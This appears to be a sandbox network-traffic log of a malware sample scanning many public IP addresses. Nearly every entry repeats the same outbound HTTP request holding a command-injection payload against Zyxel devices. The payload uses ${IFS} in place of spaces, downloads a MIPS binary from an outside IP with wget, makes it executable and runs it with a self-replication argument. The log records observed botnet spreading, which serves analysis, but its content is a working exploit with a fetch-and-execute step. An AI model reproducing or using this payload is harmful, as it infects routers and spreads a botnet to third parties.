                                        Jan 14, 2024 16:19:03.904279947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9485192.168.2.1359212181.196.150.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904362917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9486192.168.2.1340540222.176.199.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904443026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9487192.168.2.1341876213.208.57.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904501915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9488192.168.2.1360356137.121.221.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904572964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9489192.168.2.1345602178.240.156.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904627085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9490192.168.2.1341090196.201.48.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904687881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9491192.168.2.134825618.195.8.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904756069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9492192.168.2.1341514159.209.58.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904791117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9493192.168.2.136034246.112.168.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904834986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9494192.168.2.1358938184.16.175.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904958963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9495192.168.2.1348704200.179.173.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905002117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9496192.168.2.1336842202.167.223.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905083895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9497192.168.2.135635278.104.156.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905114889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9498192.168.2.135772061.129.70.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905157089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9499192.168.2.133416048.33.174.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905219078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9500192.168.2.135450659.74.253.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905317068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9501192.168.2.134431664.113.123.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905368090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9502192.168.2.1345174194.15.95.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905457020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9503192.168.2.1359834124.5.29.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905492067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9504192.168.2.1342488202.228.161.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905584097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9505192.168.2.1343484148.133.137.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905647039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9506192.168.2.133814682.100.118.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905670881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9507192.168.2.1356088207.13.254.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905776978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9508192.168.2.134014667.129.222.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905839920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9509192.168.2.135070648.15.18.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905911922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9510192.168.2.13524248.103.188.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.905960083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9511192.168.2.1335138125.20.156.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906039953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9512192.168.2.134329837.155.62.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906099081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9513192.168.2.135644494.174.33.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906163931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9514192.168.2.1357386124.154.20.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906250000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9515192.168.2.1360934134.26.32.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906292915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9516192.168.2.136055675.84.24.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906357050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9517192.168.2.133342644.95.55.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906444073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9518192.168.2.1353162113.118.197.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906512022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9519192.168.2.1334672157.252.18.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906567097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9520192.168.2.135120289.110.51.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906632900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9521192.168.2.134354468.117.141.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906685114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9522192.168.2.133828264.255.127.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906749010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9523192.168.2.133641627.156.163.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906815052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9524192.168.2.1348208134.207.60.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906877041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9525192.168.2.136041491.43.59.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906936884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9526192.168.2.133884060.115.7.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.906990051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9527192.168.2.1355380121.137.156.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907023907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9528192.168.2.1357256139.85.107.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907124996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9529192.168.2.1356630219.60.177.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907181025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9530192.168.2.135694836.52.191.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907252073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9531192.168.2.1348142173.62.100.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907330990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9532192.168.2.134400276.222.15.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907454014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9533192.168.2.1354256208.27.215.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907510042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9534192.168.2.1352698111.202.55.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907566071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9535192.168.2.1346430146.23.135.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907615900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9536192.168.2.133548283.69.225.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907669067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9537192.168.2.1336312113.61.112.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907730103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9538192.168.2.134153212.12.4.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907809973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9539192.168.2.1354410186.20.174.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907890081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9540192.168.2.1346536139.147.72.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.907943010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9541192.168.2.134476070.133.70.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908041000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9542192.168.2.1352222194.17.207.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908106089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9543192.168.2.134159834.61.232.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908189058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9544192.168.2.1360594165.214.57.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908230066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9545192.168.2.134273054.68.180.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908293962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9546192.168.2.134773450.126.85.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908358097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9547192.168.2.1338874166.198.162.142443
                                        TimestampBytes transferredDirectionData
